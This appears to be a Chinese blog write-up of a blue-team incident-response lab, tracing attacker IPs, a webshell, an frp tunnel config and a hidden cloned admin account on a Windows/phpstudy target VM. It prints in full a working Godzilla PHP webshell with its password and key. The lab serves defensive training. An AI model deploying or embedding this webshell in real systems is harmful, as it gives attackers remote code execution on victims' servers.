[护网训练]应急响应靶机训练-web2

[护网训练]原创应急响应靶机整理集合

靶机地址：https://pan.quark.cn/s/4b6dffd0c51a#/list/share
蓝队工具箱：https://github.com/ChinaRan0/BlueTeamTools

应急响应靶机——知攻善防实验室-CSDN博客

知攻善防 Web2 应急靶机笔记 - LingX5 - 博客园

应急响应-web2_应急响应web2-CSDN博客

前来挑战！应急响应靶机训练-Web2

应急响应靶机训练-Web2【题解】

Windows应急响应靶机–Web2

一、挑战内容

前景需要：小李在某单位驻场值守，深夜12点，甲方已经回家了，小李刚偷偷摸鱼后，发现安全设备有告警，于是立刻停掉了机器开始排查。

这是他的服务器系统，请你找出以下内容，并作为通关条件：

1.攻击者的IP地址（两个）？

2.攻击者的webshell文件名？

3.攻击者的webshell密码？

4.攻击者的伪QQ号？

5.攻击者的伪服务器IP地址？

6.攻击者的服务器端口？

7.攻击者是如何入侵的（选择题）？

8.攻击者的隐藏用户名？

二、解题程序

关于靶机启动

使用Vmware启动即可，如启动错误，请升级至Vmware17.5以上

靶机环境：

Windows Server 2022

phpstudy(小皮面板)

用户:administrator

密码:Zgsf@qq.com

三、题解答案

开始：

题目1：攻击者IP两个

先把服务开起来：

IP？那就先看Apache的日志：

C:\phpstudy_pro\Extensions\Apache2.4.39\logs

攻击者进行了目录扫描：

在2024:13:02:00的时候突然冒出来一个system.php文件访问成功，但在之前也没有发现上传成功的日志，而且距离上一个日志间隔8分钟。

因为该服务器还开着FTP，看一眼日志：

不是，日志呢？？？

看看作者文章，对啊，就在这个目录：C:\phpstudy_pro\Extensions\FTP0.9.60\Logs

我咋没有？？？灵机一动，直接开搜：

只搜到了两个快捷方式，而且回收站里面也没有。。。

这里用原作者的图片顶一下：

斯，这里需要两个IP，上面这个是192.168.126.135，还有一个，找找日志：

找到另一个：192.168.126.129 hack887$应该是隐藏用户

2024-02-29 13:28:48    hack887$ WIN-RRCVI68HLRI 10    User32     WIN-RRCVI68HLRI    C:\Windows\System32\svchost.exe    192.168.126.129    0 4624

192.168.126.135 192.168.126.129

题目2：攻击者webshell文件名

webshell名称肯定是system.php了，D盾跑一下：C:\phpstudy_pro\WWW

system.php

题目3：攻击者webshell密码

看一下system.php：典型的哥斯拉PHP_XOR_BASE64的马

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='hack6618';
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

密码：hack6618

题目4：攻击者伪QQ号

QQ？找Tencent相关的：C:\Users\Administrator\Documents\Tencent Files

777888999321

题目5：攻击者伪服务器IP地址

查看一下服务器最近的操作，winr+r输入%userprofile%/recent

打开文件所在位置：

C:\Users\Administrator\Documents\Tencent Files\777888999321\FileRecv\frp_0.54.0_windows_amd64\frp_0.54.0_windows_amd64

[common]
server_addr = 256.256.66.88
server_port = 65536

256.256.66.88

题目6：攻击者的服务器端口

65536

题目7：攻击者是如何入侵的（选择题）

FTP 有可能是FTP的匿名登录

题目8：攻击者隐藏用户名

D盾：

hack887$不仅仅是隐藏用户，还是克隆了管理员账号，这种在控制面板的用户里是显示不出来的，net user查询不到。

计算机\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hack887$

应急的时候遇到这类用户直接删除该项以及3E8

hack887$

提交答案：
1.IP
192.168.126.135
192.168.126.129

2.webshell名称
system.php

3.webshell密码
hack6618

4.伪QQ号
777888999321

5.服务器IP
256.256.66.88

6.服务器端口
65536

7.如何入侵
FTP

8.隐藏用户
hack887$
                        
原文链接：https://blog.csdn.net/m0_65712192/article/details/147071176